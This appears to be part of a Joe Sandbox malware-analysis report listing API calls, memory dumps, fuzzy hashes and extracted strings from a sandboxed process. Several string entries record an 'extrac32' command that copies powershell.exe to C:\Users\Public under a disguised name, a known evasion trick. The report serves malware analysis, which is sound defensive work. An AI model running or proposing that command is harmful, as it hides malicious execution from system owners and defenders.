• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCF951
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCF96B
• wcschr.MSVCRT ref: 00007FF789BCFA8E
• _get_osfhandle.MSVCRT ref: 00007FF789BCFB14
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCFB2D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCFBEA
• _get_osfhandle.MSVCRT ref: 00007FF789BCF996
  • Part of subcall function 00007FF789BD0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF789BE849D,?,?,?,00007FF789BEF0C7), ref: 00007FF789BD0045
  • Part of subcall function 00007FF789BD0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BEF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BD0071
  • Part of subcall function 00007FF789BD0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0092
  • Part of subcall function 00007FF789BD0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BD00A7
  • Part of subcall function 00007FF789BD0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD0181
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD401
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD41B
• longjmp.MSVCRT(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD435
• longjmp.MSVCRT(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD480
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
• String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
• API String ID: 3964947564-3923461198
• Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
• Instruction ID: 595b233fee0a876da68b1ad4d30df6d1d9ca3e52b33322c307394aa22108c222
• Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
• Instruction Fuzzy Hash: 64026D21A0968A86EB54BF21D848178FEB5FF85FABFF44135D90E42694DF3DA405C720
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmp$iswspacewcschr
• String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
• API String ID: 840959033-3627297882
• Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
• Instruction ID: 4211118bbea2dbb3ad5e21c13c292b0b335293eedc5265c8fa3e386c4432ebdb
• Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
• Instruction Fuzzy Hash: D6D15721E0C64BC6FA54BF21E8592B8AAB0BF45F46FF45035E94E472A5EE2CE405C730
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmp$EnvironmentVariable
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
• API String ID: 198002717-267741548
• Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
• Instruction ID: 3ee1d55f7debd053ad87d0b4589c8f6b52253fca84852f0eef335fd204e9e62b
• Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
• Instruction Fuzzy Hash: 2C512A21A0864B86F650AF16A818279FEB1FF49F92FE4A035D90F13695EF2DE104C760
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: iswdigitiswspacewcschr
• String ID: ()|&=,;"$=,;$Ungetting: '%s'
• API String ID: 1595556998-2755026540
• Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
• Instruction ID: 8b94d3e687d0a376922d933758e47e6858e6a8e231de90d1612eee7d9714d2fa
• Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
• Instruction Fuzzy Hash: 9F227C65E0C65A86FA607F26E544279EAB0BF00FABFF08176D98D466D4DF3CA441C630
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$Processwcschr$Alloc$Sizeiswspace
• String ID: "$=,;
                                                                                                                    • API String ID: 3545743878-4143597401
                                                                                                                    • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                    • Instruction ID: 164507219820a78b379c7a11d74c1a748083d1d0c2170e8290eba14a5b2e846c
                                                                                                                    • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                    • Instruction Fuzzy Hash: 42C19569A0969A82EB756F11D400379FEF0FF84F9AFA59035DA4D02B94EF3CA445C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentFormatMessageThread
                                                                                                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                    • API String ID: 2411632146-3173542853
                                                                                                                    • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                    • Instruction ID: 35fbd4614c76641ff088e2972d19b741d55f3a99318d2f693ab980a3c53d23f7
                                                                                                                    • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                    • Instruction Fuzzy Hash: 5C616BB1A1964AC1EA24EF51A4145B9ABB8FF44F86FE4413AEE4D03758EF7CE540C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile_open_osfhandle
                                                                                                                    • String ID: con
                                                                                                                    • API String ID: 2905481843-4257191772
                                                                                                                    • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                    • Instruction ID: 112f27413d1f9d5081d6a331526e7c0725ed7c5c05c77d69bd2ba058dd18133c
                                                                                                                    • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                    • Instruction Fuzzy Hash: 4871A532A086858AE760AF55E444279FEB0FB89FA2FA44234DA5E427D4DF3DD449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3829876242-3916222277
                                                                                                                    • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                    • Instruction ID: 152e21fea1e5532e6ae3f02ee8050f2dfb2c8cbc38178a657ad274a5ba6b2eb4
                                                                                                                    • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                    • Instruction Fuzzy Hash: 99617E22A0864687EA14AF51941417EBAB4FFC9F96FA58135DE0E07795EF3CE409CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                    • String ID: CSVFS$NTFS$REFS
                                                                                                                    • API String ID: 3510147486-2605508654
                                                                                                                    • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                    • Instruction ID: ff350af1ce8a9bb48c6a083615066fc6edcec415700679fdb3c8c517ade62cac
                                                                                                                    • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                    • Instruction Fuzzy Hash: 78617F32708BC68AEB659F21D8543E9BBB4FB45B8AF945035DA0D4B758EF38D104C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • longjmp.MSVCRT(?,00000000,00000000,00007FF789BC7279,?,?,?,?,?,00007FF789BCBFA9), ref: 00007FF789BE4485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: longjmp
                                                                                                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                    • API String ID: 1832741078-366822981
                                                                                                                    • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                    • Instruction ID: 16fd5e9b91d4a141e45b85494afb12685d7b82db018508fa49dd583c206364c9
                                                                                                                    • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                    • Instruction Fuzzy Hash: CBC17E60E0C64A85E624BF5691846BCAFB6BF46FAAFF00036DD0D57691CF2CA546C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heapwcschr$AllocateProcessmemset
                                                                                                                    • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                    • API String ID: 2060774286-969133440
                                                                                                                    • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                    • Instruction ID: 8be3dadc8041a8a5c7e2adb5761a162a52edd1f40069be2372ff4ccdf2cf1f05
                                                                                                                    • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                    • Instruction Fuzzy Hash: 0EB1A621A0D69A81EA60AF15944427DBBB0FF84FAAFE50235DA5E437D4DF3CE945C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                    • API String ID: 0-2096332766
                                                                                                                    • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                    • Instruction ID: 363fb0081b49b9f1980f6573bc77d4820ffede08c3469366566fd40bfd2db124
                                                                                                                    • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                    • Instruction Fuzzy Hash: 86515C20A0C68B86FB14BF60A4182B9BEB1BF45F87FE45035D60E462A5EF7CA405C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                    • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                    • API String ID: 1606811317-763823931
                                                                                                                    • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                    • Instruction ID: ae6b4d6c9635c539141b04c38e6522dae8860c5a99c0aa9aad87bee40e946da6
                                                                                                                    • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                    • Instruction Fuzzy Hash: 44D18221A09A8A82EA50AF25E804179EBB0FF85FA6FE44131DA5D077E5DF3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ErrorLast$InformationVolume
                                                                                                                    • String ID: %04X-%04X$~
                                                                                                                    • API String ID: 2748242238-2468825380
                                                                                                                    • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                    • Instruction ID: 81323735a53d38904496eff4a97faeb927f6c80911cd958a6efe76932b8e4485
                                                                                                                    • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                    • Instruction Fuzzy Hash: 04A1B632708BC58AEB25AF21D8402E9BBB1FB85B86F908035D94D0BB59EF3CD605C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

